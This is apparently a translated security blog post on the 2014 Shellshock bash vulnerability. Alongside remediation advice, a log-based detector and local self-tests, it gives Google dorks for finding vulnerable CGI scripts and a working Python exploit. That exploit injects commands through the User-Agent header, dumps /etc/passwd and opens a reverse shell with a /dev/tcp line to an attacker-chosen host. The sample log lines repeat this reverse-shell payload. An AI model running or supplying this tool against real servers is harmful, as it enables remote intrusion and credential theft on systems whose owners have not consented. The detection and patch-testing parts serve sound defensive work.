ShellShock

0x01: Background

New Bash security vulnerability disclosed abroad: a far greater threat than "Heartbleed"?

CVE-2014-6271: detailed analysis of the Bash vulnerability

My own feeling is that exploitation is certainly simpler and faster than Heartbleed; the difficulty is that vulnerable entry points are harder to find, and there are certainly fewer of them than there were OpenSSL instances, whereas Heartbleed was very useful for penetrating many VPNs.

0x02: Exploitation conditions and search methods

Exploitation conditions

1. The environment is attacker-controllable (the attacker can write environment variables)
2. A bash child process is spawned

CGI is the classic case: the web server exports request headers into the script's environment (User-Agent becomes HTTP_USER_AGENT), and any script that is bash itself, or that shells out through system()/popen() on a system where /bin/sh is bash, satisfies both conditions.

Google dorks

 
filetype:sh inurl:cgi-bin

filetype:cgi inurl:cgi-bin

0x03: PHP test tool

http://www.exploit-db.com/exploits/34766/


 

The PHP tool can be modified slightly to print command output and to spawn a reverse shell; you can also simply replace the cmd command with a reverse-shell one-liner.

 

0x04: Python exploitation tool


 

 

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Ported from the original Python 2 script: http.client/urllib.parse replace
# httplib/urlparse, the broken sys.setdefaultencoding assignment is dropped,
# and the Windows-only ctypes console colouring is replaced by ANSI escapes so
# the tool also runs on Linux/macOS.

import sys
import http.client
from urllib.parse import urlsplit

RED, GREEN, RESET = "\033[31m", "\033[32m", "\033[0m"

# CGI exports the User-Agent header as HTTP_USER_AGENT; an unpatched bash
# imports the "() { :;}" function definition and runs the trailing command.
PROBE = '() { :;}; /bin/bash -c "id"'


def send(hostname, urlpath, user_agent):
    """Send one GET with the payload in the User-Agent header."""
    conn = http.client.HTTPConnection(hostname, timeout=20)
    conn.request("GET", urlpath, headers={"User-Agent": user_agent})
    return conn


def cat_passwd(hostname, urlpath):
    # The echo output precedes the script's own CGI headers, so the server
    # treats the passwd content (colon-separated, hence header-shaped) as
    # response headers; dump the response headers to read it.
    print("cat /etc/passwd :")
    res = send(hostname, urlpath, "() { :;}; echo `/bin/cat /etc/passwd`").getresponse()
    for name, value in res.getheaders():
        print(name + ":" + value)


def bash_exp(url):
    hostname, urlpath = urlsplit(url)[1:3]
    try:
        res = send(hostname, urlpath, PROBE).getresponse()
        # Heuristic kept from the original: the output of `id` lands before the
        # CGI headers, so Apache answers 500 ("malformed header from script").
        # Any unrelated script error also yields 500, so confirm by hand.
        if res.status == 500:
            print(RED + "SecPulse Hint: Bash of this site is Vulnerable!" + RESET)
            cat_passwd(hostname, urlpath)
            reverse = input(GREEN + "Reverse IP & Port like 255.255.255.1/8080: " + RESET)
            if reverse:
                try:
                    print("Reversing~")
                    # The interactive shell never returns, so do not wait for a response.
                    send(hostname, urlpath,
                         "() { :;}; /bin/bash -i >& /dev/tcp/%s 0>&1" % reverse)
                except KeyboardInterrupt:
                    print("Process interrupted by user.")
                except Exception as e:
                    print(e)
            else:
                print("Nothing input, exiting...")
        else:
            print("SecPulse.com Hint: No Bash Vulnerable!")
    except Exception as e:
        print(e)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: " + sys.argv[0] + " http://www.secpulse.com/cgi-bin/index.cgi")
        sys.exit(-1)
    bash_exp(sys.argv[1])
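The following is an added example (it is not code from the SecPulse post or from the tool above) that makes the two exploitation conditions of 0x02 concrete and replaces the tool's status-500 heuristic with a marker-header probe: the injected echo runs before the CGI script prints its own headers, so its line comes back as a response header, and only a response carrying the exact random marker counts as vulnerable. The X-Shellshock header name and all sample responses are my own constructions.

```python
#!/usr/bin/env python3
"""Added example: the two exploitation conditions made concrete, plus a
marker-header probe that is more reliable than the HTTP 500 heuristic."""
import http.client
import uuid
from urllib.parse import urlsplit


def cgi_env(headers):
    """Condition 1. A CGI gateway (Apache mod_cgi, RFC 3875) copies each request
    header into the script's environment as HTTP_<NAME>, so sending a header is
    writing an environment variable. Condition 2 is met when the script is bash
    or shells out (system()/popen()), because bash imports env vars that begin
    with "() {" as functions at startup."""
    env = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def new_marker():
    """Random per-scan marker so a cached or spoofed response cannot fool us."""
    return uuid.uuid4().hex


def build_probe(marker):
    """Unpatched bash executes the command after the function body. The echo runs
    before the CGI script prints its own headers, so its line is parsed by the
    server as a response header and passed through to the client. The header
    name X-Shellshock is our own choice (assumption), not anything standard."""
    return '() { :;}; echo "X-Shellshock: %s"' % marker


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def marker_returned(headers, marker):
    """Vulnerable only if our exact marker came back as a header. A bare 500
    also fires for unrelated script errors, so it is not used as evidence."""
    return headers.get("x-shellshock") == marker


def is_vulnerable(raw_response, marker):
    _, headers, _ = parse_response(raw_response)
    return marker_returned(headers, marker)


def probe_url(url, marker, timeout=20):
    """Live version (network; not exercised by the offline samples below):
    send the probe in User-Agent and evaluate the response headers."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=timeout)
    conn.request("GET", parts.path or "/", headers={"User-Agent": build_probe(marker)})
    res = conn.getresponse()
    return marker_returned({k.lower(): v for k, v in res.getheaders()}, marker)


# Constructed sample responses (not captured from any real host).
MARKER = "0123456789abcdef0123456789abcdef"
VULNERABLE_RESPONSE = ("HTTP/1.1 200 OK\r\nX-Shellshock: " + MARKER +
                       "\r\nContent-Type: text/html\r\n\r\n<html>ok</html>")
PATCHED_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>ok</html>"
BROKEN_CGI_RESPONSE = "HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    print(cgi_env({"User-Agent": build_probe(MARKER)})["HTTP_USER_AGENT"])
    for label, raw in (("vulnerable", VULNERABLE_RESPONSE),
                       ("patched", PATCHED_RESPONSE),
                       ("unrelated 500", BROKEN_CGI_RESPONSE)):
        print("%-14s -> %s" % (label, is_vulnerable(raw, MARKER)))
```

Run against a real target with `probe_url("http://host/cgi-bin/script.cgi", new_marker())`; the offline samples show the three outcomes the 500 heuristic cannot tell apart: a vulnerable host, a patched host, and a host whose CGI script merely crashed.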

 

0x05: Python batch-search and automated attack tool

Given the potential for harm, it is not published here.

0x06: A CGI web shell

Screenshot: "File Manager" (Copyright 2003 Gamma Group)

0x07: Remediation

Update bash. The first vendor patch (for CVE-2014-6271) was incomplete; later packages also fix CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277 and CVE-2014-6278, so update to a build that passes all of the tests below, and treat any CGI script that shells out as exposed until then.
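While the patch is rolled out (or to find out who probed a host before it was patched), the attempts are easy to spot in the web server's access log, because every payload variant starts with the function-definition prefix that bash keys on. The following is an added example, not part of the SecPulse post; the log lines are constructed to mirror the payloads used by the tool in 0x04, and the IP addresses are documentation ranges.

```python
#!/usr/bin/env python3
"""Added example: flag Shellshock probes in a combined-format web access log."""
import re

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
# Apache writes embedded quotes as \" so the quoted fields accept escaped characters.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# bash's import check keys on the literal "() {" prefix; the rule allows
# optional whitespace so lightly obfuscated variants are flagged too.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_log_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_shellshock(lines):
    """Return (ip, field, value) for every logged field carrying the prefix.
    Any request header can carry the payload (Cookie, Host, Referer...), but
    the combined format records only the request line, Referer and User-Agent,
    so those are what can be seen here; the rest needs full-header logging."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append((rec["ip"], field, rec[field]))
    return hits


# Constructed sample lines (not from any real server); the payloads mirror the
# ones used by the tool in 0x04.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" '
    '500 - "-" "() { :;}; /bin/bash -c \\"id\\""',
    '203.0.113.5 - - [25/Sep/2014:10:00:02 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" '
    '200 512 "() { :;}; echo `/bin/cat /etc/passwd`" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:00:03 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:10:00:04 +0000] "GET /cgi-bin/test.sh HTTP/1.1" '
    '200 77 "-" "() {:;}; /bin/bash -i >& /dev/tcp/203.0.113.9/8080 0>&1"',
]

if __name__ == "__main__":
    for ip, field, value in find_shellshock(SAMPLE_LOG):
        print("%s  %-8s %s" % (ip, field, value))
```

Feed it `open("/var/log/apache2/access.log")` instead of SAMPLE_LOG to sweep a real log; the second sample line shows why Referer must be checked as well as User-Agent, and the 500 status on the first line is the same "malformed header" symptom the tool in 0x04 relies on.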

 

The vulnerability evolved quickly afterwards, because one fix after another was bypassed; shellshocker.net did a good job of listing the variants:

Exploit 1 (CVE-2014-6271)

There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you see "vulnerable" you need to update bash. Otherwise this particular bug is fixed, but run the remaining tests below as well, since the first patches were bypassed.

Exploit 2 (CVE-2014-7169)

Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.

env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo

If the above command outputs the current date (it may also show errors), you are still vulnerable.

Exploit 3 (???)

Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.

env X=' () { }; echo hello' bash -c 'date'

If the above command outputs "hello", you are vulnerable.

Exploit 4 (CVE-2014-7186)

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"

A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".

Exploit 5 (CVE-2014-7187)

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"

A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".

Exploit 6 (CVE-2014-6278)

shellshocker='() { echo You are vulnerable; }' bash -c shellshocker

You shouldn't see "You are vulnerable"; if you're patched you will see "bash: shellshocker: command not found".

Exploit 7 (CVE-2014-6277)

bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable

If the command outputs "vulnerable", you are vulnerable.


If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/*release* for your OS.

 

Original author: 安全脉搏 (SecPulse)

SecPulse URL: http://www.secpulse.com/archives/917.html

 
